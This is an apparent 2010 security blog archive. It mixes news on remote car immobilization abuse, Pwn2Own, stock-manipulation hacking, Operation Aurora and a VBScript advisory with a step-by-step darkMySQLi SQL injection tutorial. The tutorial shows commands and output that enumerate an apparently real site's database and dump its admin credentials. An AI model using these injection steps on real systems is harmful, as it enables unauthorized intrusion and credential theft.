Thursday, March 18, 2010

Hacker Disables More Than 100 Cars Remotely

More than 100 drivers in Austin, Texas found their cars disabled or the horns honking out of control, after an intruder ran amok in a web-based vehicle-immobilization system normally used to get the attention of consumers delinquent in their auto payments.
Police with Austin’s High Tech Crime Unit on Wednesday arrested 20-year-old Omar Ramos-Lopez, a former Texas Auto Center employee who was laid off last month, and allegedly sought revenge by bricking the cars sold from the dealership’s four Austin-area lots.
“We initially dismissed it as mechanical failure,” says Texas Auto Center manager Martin Garcia. “We started having a rash of up to a hundred customers at one time complaining. Some customers complained of the horns going off in the middle of the night. The only option they had was to remove the battery.”
The dealership used a system called Webtech Plus as an alternative to repossessing vehicles that haven’t been paid for. Operated by Cleveland-based Pay Technologies, the system lets car dealers install a small black box under vehicle dashboards that responds to commands issued through a central website, and relayed over a wireless pager network. The dealer can disable a car’s ignition system, or trigger the horn to begin honking, as a reminder that a payment is due. The system will not stop a running vehicle.

Texas Auto Center began fielding complaints from baffled customers the last week in February, many of whom wound up missing work, calling tow trucks or disconnecting their batteries to stop the honking. The troubles stopped five days later, when Texas Auto Center reset the Webtech Plus passwords for all its employee accounts, says Garcia. Then police obtained access logs from Pay Technologies, and traced the saboteur’s IP address to Ramos-Lopez’s AT&T internet service, according to a police affidavit filed in the case.
Ramos-Lopez’s account had been closed when he was terminated from Texas Auto Center in a workforce reduction last month, but he allegedly got in through another employee’s account, Garcia says. At first, the intruder targeted vehicles by searching on the names of specific customers. Then he discovered he could pull up a database of all 1,100 Auto Center customers whose cars were equipped with the device. He started going down the list in alphabetical order, vandalizing the records, disabling the cars and setting off the horns.
“Omar was pretty good with computers,” says Garcia.
The incident is the first time an intruder has abused the no-start system, according to Jim Krueger, co-owner of Pay Technologies. “It was a fairly straightforward situation,” says Krueger. “He had retained a password, and what happened was he went in and created a little bit of havoc.”

Krueger disputes that the horns were honking in the middle of the night; he says the horn honking can only be activated between 9 a.m. and 9 p.m.
First rolled out about 10 years ago, remote immobilization systems are a controversial answer to delinquent car payments, with critics voicing concerns that debtors could suffer needless humiliation, or find themselves stranded during an emergency. Proponents say the systems let financers extend credit to consumers who might otherwise be ineligible for an auto loan.
Austin police filed computer intrusion charges against Ramos-Lopez on Tuesday.

Hackers offered $100,000 for browser and phone exploits

Security company 3Com TippingPoint has jacked up to $100,000 (£65,000) the prize money on offer to anyone able to hack a range of browsers and mobile devices at the forthcoming CanSecWest security conference.

Running for the fourth year at the event, $40,000 of the Pwn2Own contest pot will be on offer to entrants that successfully exploit security vulnerabilities to compromise the top four browsers, Internet Explorer, Mozilla Firefox, Google Chrome, and Safari, equivalent to $10,000 per browser.
To win the money outright, the attacks on IE, Firefox and Chrome must work while running on a fully-patched Windows 7, while Safari will be attacked running on OS X Snow Leopard. Brownie points will be gained if the same flaw works on Vista and XP, although the assumption would be that this would be highly likely anyway.
To make the contest tougher, attackers can't use third-party plug-ins such as Adobe Flash on day one of the event. These are often a soft underbelly, so excluding them raises the bar.
Part two of the contest, account for the remaining $60,000, will ask contestants to successfully hack the Apple iPhone, Blackberry Bold 9700, the Nokia/Symbian S60, and an unspecified Motorola device running Android, with each worth $15,000.
In both sections of the contest - browser and mobile device - bonus benefits will also be offered for exploits that show an unusual level of difficulty, and winners will get to keep the device on which the hack was carried out.

Despite the eye-catching cash on offer, the contest is really a clever way of marketing TippingPoint's controversial Zero-Day Initiative (ZDI) scheme, under which researchers are paid to find exploits which are then added to the intrusion detection engines from which the company makes much of its living.

At the time of its launch in 2005, the ZDI was criticised by rival vendors and some independent voices as tantamount to encouraging people to sell exploits uncovered to the highest bidder, in this case, 3Com's TippingPoint division.

TippingPoint points out that all exploits discovered through the Pwn2Own contest will be disclosed to the vendors concerned as well as being added to its own database.
Pwn2Own co-ordinator at TippingPoint, Aaron Portnoy, predicted that mobile devices would be particularly vulnerable while the easiest browser to crack would be IE on Windows 7. The browser that would resist attacks the most robustly would be Chrome thanks to its sandbox security feature which restricts what can happen inside a browser.

"The discoveries and threats that come out of this will unequivocally show just how much ‘at risk' many businesses are," said Portnoy in his contest notes.
More information on Pwn2Own can be found on TippingPoint's website. The contest will run at CanSecWest security conference held in Vancouver on 24 March.

Article taken from:

Wednesday, March 17, 2010

SEC: Hacker Manipulated Stock Prices

U.S. regulators are moving to freeze the assets and trading accounts of a Russian accused of hacking into personal online portfolios and manipulating the price of dozens of stocks listed on the Nasdaq Stock Market and New York Stock Exchange.
A New York federal judge on Tuesday sided with the Securities and Exchange Commission and froze the assets of Broco Investments, believed to be a one-trader operation based in St. Petersburg, Russia. The SEC said Broco capitalized by artificially moving prices of more 38 thinly traded securities — enabling Broco to profit from up-or-down price swings.
“These transactions have created the appearance of legitimate trading activity and have artificially affected the prices of at least 38 issuers,” (.pdf)  the Securities and Exchange Commission said in court filing.
The so-called “hack, pump and dump” scheme is among the latest illicit methods of gaming the market though hacking.
An Indian man was sentenced to two years in prison for undertaking a similar scam in 2008. That same year, a Ukrainian hacked into Thomson Financial to get a peek about an upcoming negative earnings report for IMS Health, earning nearly $300,000 for a few minutes’ work.

And in July, a computer programmer working for Goldman Sachs was arrested on charges  he stole proprietary source code for software his employer uses to make sophisticated, high-speed stock and commodities trades.
In the latest case, the affected stocks ranged from Akeena Solar, Magellan Petroleum to Xerium Technologies. The prices fluctuated more than 20 percent in some instances.
Broco would purchase these and other stocks in its own portfolio and immediately place unauthorized buy orders at inflated prices of the same securities in hacked Scottrade accounts, the SEC said.
“Immediately or shortly thereafter, the defendants capitalized on the artificially inflated share prices of the targeted securities by selling the shares previously acquired in their account,” the SEC alleged. “In other instances, the defendants profited by covering short positions previously established in their account while placing unauthorized sell orders through the compromised accounts at substantially lower prices.”

Along the way, victims lost $600,000 in market value the last few months alone, the SEC said. And Broco, believed to be a one-person company run by Valery Maltsev, reaped $255,000 in ill-gotten gains during the same time.
Daily trading volume in Pennsylvania-based financial services company AmeriServe Financial averaged about 11,300 shares in from Dec. 1 to Dec. 20, the SEC said. The next day, volume increased 20 times. At least 200,000 shares were bought and sold through Broco or hacked Scottrade accounts, allowing Broco to leverage the prices for its own profits.
“Broco grossed $141,500 in approximately 15 minutes,” the SEC said.

Saturday, March 06, 2010

Multi Purpose MySQL Injection Tool -

I would like to share with you about, a Multi Purpose MySQL Injection tool that developed by rsauron (, one of darkc0deCrews ( This Python script allows you to automate 80% of the search and exploitation of SQL injection. I’m using this tool since Feb 2009 and I can say that this tool will help you and reduce time to find Blind SQL or SQL injection during web application penetration testing. This tool is very useful especially for IT security consultant or people who are involved in penetration testing because it will help you to save your time for finding MySQL vulnerability.
Today, I will show you how to use until you successfully compromised MySQL database server. If you used Google and search for “” word, you will see a lot of articles and links about this tool. For more explanations, I hope you can refer to that articles and can download tool from there. When you are using this tool, it is very easy to find MySQL vulnerability and it only takes 2-3 minutes to finish your hands-on for web assessment. So, you will have much time to verify the findings and do research about the solutions to prevent SQL Injection vulnerability.
Before you start using tool, you need to find a vulnerable website or link where you can inject malicious code or character to the vulnerable parameter on the website. For the example below, you can see there is a vulnerability in the id parameter where you can insert character string such as +, - ,",', <>, %,;,(), &. This vulnerability happened because the programmer or webmaster of the server did not sanitize user input and filter out the code properly. When you put or insert character, number and code to the vulnerable parameter, you will see MySQL syntax errors occurred.
Targeted URL:
For the targeted URL above, when I try to input this at the character string 22 after id parameter at the popup_news.php page, it shows this MySQL syntax error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/johncrackernet/www/htdocs/functions.php on line 114.
From the syntax error, you can see MySQL vulnerability occurred at character string 22 after id parameter where it allows you to perform SQL injection attack to this website. 

Step 1: Finding number of columns in MySQL Database

To perform SQL injection attack, I used to attack the targeted URL above. You must understand and know how to use tool. If you do not understand how to use it, you can refer to the Help menu that built-in together with this tool (Use –h command to see Help menu)
E:\Izhar\Tool\SQL Injection\DarkCode Exploit> -h
       darkMySQLi v1.6
Usage: ./ [options]
-h, --help                                shows this help message and exits
-d, --debug                             display URL debug information
-u URL,                                 --url=URL  Target url
-b, --blind                              Use blind methodology (req: --string)
-s, --string                             String to match in page when the query is valid
--method=PUT                    Select to use PUT method ** NOT WORKING
--dbs                                       Enumerate databases MySQL v5+
--schema                               Enumerate Information_schema (req: -D,opt: -T) MySQL v5  
--full                                       Enumerate all we can          MySQL v5+
--info                                      MySQL Server configuration    MySQL v4+
--fuzz                                      Fuzz Tables & Columns Names   MySQL v4+
--findcol                                 Find Column length            MySQL v4+
--dump                                   Dump database table entries (req:-T,opt:-D,-C,--start  MySQL v4+          
--crack=HASH                     Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT            Wordlist to be used for cracking
-D DB                                     database to enumerate
-T TBL                                   database table to enumerate
-C COL                                  database table column to enumerate
--ssl                                        To use SSL
--end                                       To use   +  and -- for the URLS --end "--" (Default)
                                                To use /**/ and /* for the URLS --end "/*"
--rowdisp                               Do not display row # when dumping
--start=ROW                        Row number to begin dumping at
--where=COL,VALUE       Use a where clause in your dump
--orderby=COL                    Use a orderby clause in your dump
--cookie=FILE.TXT             Use a Mozilla cookie file
--proxy=PROXY                   Use a HTTP proxy to connect to the target url
--output=FILE.TXT            Output results of tool to this file

From the targeted URL that I have tested above, I found vulnerability at character string 22 after parameter id that will allow us to do SQL injection. So, I used this vulnerable page (URL:  to test with tool.
Use this command to find the number of columns in the database:
./ –u “URL” --findcol
E:\Izhar\Tool\SQL Injection\DarkCode Exploit> –u “" --findcol
|-------------------------------------------------- |
|                  v1.6   |
|   1/2009               |
|Multi Purpose MySQL Injection Tool|
| Usage: [options]      |
|             -h help       |
|-------------------------------------------------- |
[+] URL:
[+] 06:28:14
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
        Proxy: - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1, 2,3,4,5,6,7,8,9,10,
[+] Column Length is: 10
[+] Found null column at column #: 3,4,7,8,

[!] SQLi URL:,2,3,4,5,6,7,8,9,10--
[!] darkMySQLi URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--

[-] 06:28:23
[-] Total URL Requests: 10
[-] Done
Don't forget to check darkMySQLi.log

From the testing result above, I found a total of 10 columns for database. But, column number 3, 4, 7 & 8 are null column. From SQL Server perspective, a NULL is not a value, it only means that a value was not provided when the row was created. These null columns will give advantage to the attacker to test SQL injection. The results above show SQLi URL and darkMySQLi URL.  Based on the Python tool script, darkc0de function will try to concatenate supplied strings using MySQL CONCAT function, test hash database, generates hex representation of string and other functions. From darkMySQLi URL, we can see this darkc0de will try to test SQL injection at null columns for column number 3, 4, 7 & 8.      

Step 2: Enumerate all information in MySQL Database
In the first step, I already gather the information about the number of columns in database. I found 10 columns in the database and 4 of columns are null columns. These null columns can be exploited using SQL injection technique. From darkc0de string, this Python tool will try to concatenate all of the information as it can to the null columns by using MySQL CONCAT. In this step, darkMySQLi URL will be using to enumerate all of the information in database. This darkMySQLi URL will replace the previous URL that we have tested in the first step.
Use this command to find all of the information that can gather from database:
./ –u “darkMySQLi URL” --full

E:\Izhar\Tool\SQL Injection\DarkCode Exploit> -u “, 2, darkc0de, darkc0de, 5, 6, darkc0de, darkc0de, 9, 10--" --full

|--------------------------------------------------  |
|                   v1.6   |
| 1/2009                  |
| Multi Purpose MySQLInjection Tool|
| Usage: [options]       |
|             -h help        |
|--------------------------------------------------   |

[+] URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 06:29:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
        Proxy: - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
        Database: dbtraffic
        Version: 5.0.45-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 270

[Database]: dbtraffic
[Table: Columns]

[1]TRA_REG: id,tra_name,tra_lastname,tra_address,tra_passport,tra_state
[2]TRA_Events: events_id, events_title, events_url, events_desc, events_sched, events_status
[3]TRA_code: code,item,adl,ingred
[4]banner_ach: id,id_uname,image,impressions,clicks,url
[5]cal_file: id,page_main,filename,code
[6]cal_msg: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[7]cal_msg_backup: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[8]cal_name: id,name
[9]cal_users: uid,username,password,fname,lname,userlevel,email
[10]cal_memo: id,memo

[-] 06:35:12
[-] Total URL Requests: 25
[-] Done

The results above show this tool successfully worked because it can enumerate all information in MySQL database such as database name, database version, tables, columns and rows. From the tables and columns that I have gathered, some of data are valuable and confidential. An attacker or hacker normally will look at the valuable data such as usernames, passwords, credit card numbers or Paypal accounts. Attackers will try to dump the data to get details and complete information from the servers or machines that they have compromised.
Step 3: Dumping the data from MySQL Database Table
In this step, I want to dump MySQL database table that contain usernames and passwords because all of these data can be consider as valuable and confidential.
Use this command to find all of the information that can gather from database:
./ –u “darkMySQLi URL” - -dump –D “Database name” –T “Table name” –C “Column”
E:\Izhar\Tool\SQL Injection\DarkCode Exploit> –u ", 2, dark0de, darkc0de, 5, 6,
darkc0de, darkc0de, 9, 10--" --dump -D dbtraffic -T cal_users -C uid,username,password,fname,lname,userlevel, email
|                         v1.6   |
|   1/2009                      |
|     -- Multi Purpose MySQL Injection Tool --     |
| Usage: [options]                   |
|                      -h help  |
[+] URL:,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 07:00:41
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Building Proxy List...
        Proxy: - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
        Database: dbtraffic
        Version: 5.0.45-log
[+] Dumping data from database "dbtraffic" Table "cal_users"
[+] and Column(s) ['uid', 'username', 'password', 'fname', 'lname', 'userlevel', 'email']
[+] Number of Rows: 1

[1] 1:admin:password:default:user:2:
[-] 07:00:44
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log

The results above show that I could gather information about id, username, password, fullname, email, and userlevel from row number 9 that I dumped from MySQL database.

As a conclusion, this is very useful for especially for IT Security Consultant because you can save much times for penetration testing with the better quality findings.

If you want to download my simple article regarding this, you can refer to The Exploit Database website.

Friday, March 05, 2010

'Google' Hackers Alter Source Code?

Hackers who breached Google and other companies in January targeted source-code management systems, security firm McAfee asserted Wednesday. They manipulated a little-known trove of security flaws that would allow easy unauthorized access to the intellectual property the system is meant to protect.
The software-management systems, widely used at businesses unaware that the holes exist, were exploited by the Aurora hackers in a way that would have enabled them to siphon source code, as well as modify it to make customers of the software vulnerable to attack. It’s akin to making yourself a set of keys in advance for locks that are going to be sold far and wide.

Operation Aurora is a cyber attack which began in mid-December 2009 and continues into February 2010. The attack was first publicly disclosed by Google on January 12 in a blog post. In the blog post, Google said the attack originated in China. The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman and Dow Chemical, and the Rand Corporation were also among the targets.

As Operation Aurora highlighted, advanced persistent threats (APT) are an increasingly common form
of complex and directed attacks that use insidious techniques for gaining access to privileged systems
and maintaining that access until all of the attackers’ goals and objectives have been met. Operation
Aurora employed an APT technique that proved extremely successful in targeting, exploiting, accessing,
and exfiltrating highly valuable intellectual property from its victims.

How Aurora Worked
Operation Aurora included numerous steps that all occurred invisibly in an instant from the user’s
perspective. As you can see in the illustration below, without any apparent signs of malicious intent
or actions, Operation Aurora completed its attack in six simple steps:
  1. A targeted user received a link in email or instant message from a “trusted” source.
  2. The user clicked on the link which caused them to visit a website hosted in Taiwan that also contained a malicious JavaScript payload.
  3. The user’s browser downloaded and executed the malicious JavaScript, which included a zero-day Internet Explorer exploit.
  4. The exploit downloaded a binary disguised as an image from Taiwan servers and executed the
    malicious payload.
  5. The payload set up a backdoor and connected to command and control servers in Taiwan.
  6. As a result, attackers had complete access to internal systems. They targeted sources of intellectual property, including software configuration management (SCM) systems accessible by the compromised system. The compromised system could also be leveraged to further penetrate the network.
A white paper released by security firm McAfee during this week’s RSA security conference in San Francisco provides a couple of new details about the Operation Aurora attacks (.pdf) that affected 34 U.S. companies, including Google and Adobe, beginning last July. McAfee helped Adobe investigate the attack on its system and provided information to Google about malware used in the attacks.

Wednesday, March 03, 2010

Microsoft Security Advisory (981169)- Vulnerability in VBScript Could Allow Remote Code Execution

Microsoft has released a new advisory for vulnerability in VBScript that is exposed on supported versions of Microsoft Windows 2000, Windows XP, and Windows Server 2003 through the use of Internet Explorer.

The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer. If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user. On systems running Windows Server 2003, Internet Explorer Enhanced Security Configuration is enabled by default, which helps to mitigate against this issue.
To see full Microsoft advisory, please see here:

From this vulnerability, attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer. Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so. To trigger vulnerability some user interaction is needed and the victim has to press F1 when MsgBox popup is displayed. It is possible to pass remote samba share as helpfile parameter. In addition there is a stack based buffer overflow when helpfile
parameter is too long. The vulnerability allows remote attacker to run arbitrary code on victim machine.

This is a POC for this vulnerability:
01 Feb 2007: The vulnerability was discovered.
26 Feb 2010: Public disclosure
01 March 2010: Microsoft Security Advisory (981169)

I tested it in my machine and I understand how this vulnerability works. The screenshots below show some of my testing:
Screenshot 1:

Screenshot 2:

 Screenshot 3:

 Screenshot 4:

Screenshot 5:

Screenshot 6:

Screenshot 7:

Screenshot 8:

Monday, March 01, 2010

New Paper: SSL/TLS Hardening and Compatibility report 2010

G-SEC™ is a vendor independent Luxemburgish led security consulting group that offers IT Security consulting services on an organizational and technical level. Thierry ZOLLER, Principal Security Consultant from G-SEC has released a paper about SSL/TLS Hardening.

This paper aims at answering the following questions :
-What SSL/TLS configuration is state of the art and considered secure (enough) for the next years?
-What SSL/TLS ciphers do modern browsers support ?
-What SSL/TLS settings do server and common SSL providers support ?
-What are the cipher suites offering most compatibility and security ?
-Should we really disable SSLv2 ? What about legacy browsers ?
-How long does RSA still stand a chance ?
-What are the recommended hashes,ciphers for the next years to come

The paper includes two tools:
-SSL Audit (alpha):SSL scanner scanning remote hosts for SSL/TLS support
-Harden SSL/TLS (beta) : Windows server and client SSL/TLS hardening tool

You can download complete package here:

Enhanced TKIP Michael Attacks

This paper describes about new attacks against TKIP based IEEE 802.11 networks. The structure of this paper is as follows: In Section 2, an introduction to the technical details of the Beck-Tews attack. In Section 3, two schemas on how to generate new keystreams including additional requirements and obstacles to overcome. In section 4, Michael is analyzed and a simple way of generating collisions is presented. Based on these collisions which set the internal Michael state to an arbitrary value, a key reset attack is developed, that in the end allows for packet concatenation. In Section 6, our findings are summarized and mitigation techniques suggested.
You can download this paper here: